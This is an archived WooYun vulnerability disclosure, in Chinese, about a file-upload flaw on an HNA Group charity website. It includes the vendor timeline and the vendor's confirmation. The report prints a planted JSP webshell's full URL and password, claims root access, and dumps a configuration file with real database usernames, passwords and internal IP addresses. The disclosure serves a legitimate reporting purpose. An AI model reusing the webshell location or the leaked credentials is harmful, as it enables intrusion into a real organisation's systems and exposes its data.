乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-20: 细节已通知厂商并且等待厂商处理中 2015-03-23: 厂商已经确认,细节仅向厂商公开 2015-04-02: 细节向核心白帽子及相关领域专家公开 2015-04-12: 细节向普通白帽子公开 2015-04-22: 细节向实习白帽子公开 2015-05-07: 细节向公众公开
RT..
站点:海航公益http://csr.hnagroup.com/
是一个公益站,这样的站点好,帮助别人,所以大家要保护她。
这里我们注册了一个账号在图像那里存在上传,可以突破
虽然显示上传失败,但其实已经上传成功了。成功拿到shell
webshell:http://csr.hnagroup.com/hna-commonweal/images/pic/commonwealuser/jspcmd1.jsp cmd!@#
root权限。危害不言而喻。配置文件
# JDBC configurationspring.jdbc.driver=com.mysql.jdbc.Driver# local server# 98 database zhanghao:mixiaofei mima:mixiaofei# 95 database zhanghao:hnauser mima:123456#localhost root 123456#spring.jdbc.username=mixiaofei#spring.jdbc.password=mixiaofei#95database 10.72.63.95#spring.jdbc.url=jdbc\:mysql\://10.72.63.95\:3306/hnaservice?connectTimeout\=1200000&queryTimeout\=1200000&useUnicode\=true&characterEncoding\=utf8&allowMultiQueries\=true#spring.jdbc.url=jdbc\:mysql\://10.72.63.98\:3306/hnaservice?connectTimeout\=1200000&queryTimeout\=1200000&useUnicode\=true&characterEncoding\=utf8&allowMultiQueries\=true#spring.jdbc.username=menggl#spring.jdbc.password=mglin820987#spring.jdbc.username=mixiaofei#spring.jdbc.password=mixiaofei#spring.jdbc.url=jdbc\:mysql\://10.72.63.98\:3306/hnaservice?connectTimeout\=1200000&queryTimeout\=1200000&useUnicode\=true&characterEncoding\=utf8&allowMultiQueries\=true#spring.jdbc.username=hnauserspring.jdbc.username=rootspring.jdbc.password=123456spring.jdbc.url=jdbc\:mysql\://localhost\:3306/hnacommonweal?connectTimeout\=1200000&queryTimeout\=1200000&useUnicode\=true&characterEncoding\=utf8&allowMultiQueries\=true#ce shi#spring.jdbc.url=jdbc\:mysql\://localhost\:3306/hna-commonweal-test?connectTimeout\=1200000&queryTimeout\=1200000&useUnicode\=true&characterEncoding\=utf8&allowMultiQueries\=true#xian shang#spring.jdbc.url=jdbc\:mysql\://localhost\:3306/hnacommonweal?connectTimeout\=1200000&queryTimeout\=1200000&useUnicode\=true&characterEncoding\=utf8&allowMultiQueries\=true#spring.jdbc.username=hnauser
希望尽快修复,公益网站我们要支持。帮助困难人群。
危害等级:中
漏洞Rank:10
确认时间:2015-03-23 17:25
谢谢,我们会立即组织人员修复
暂无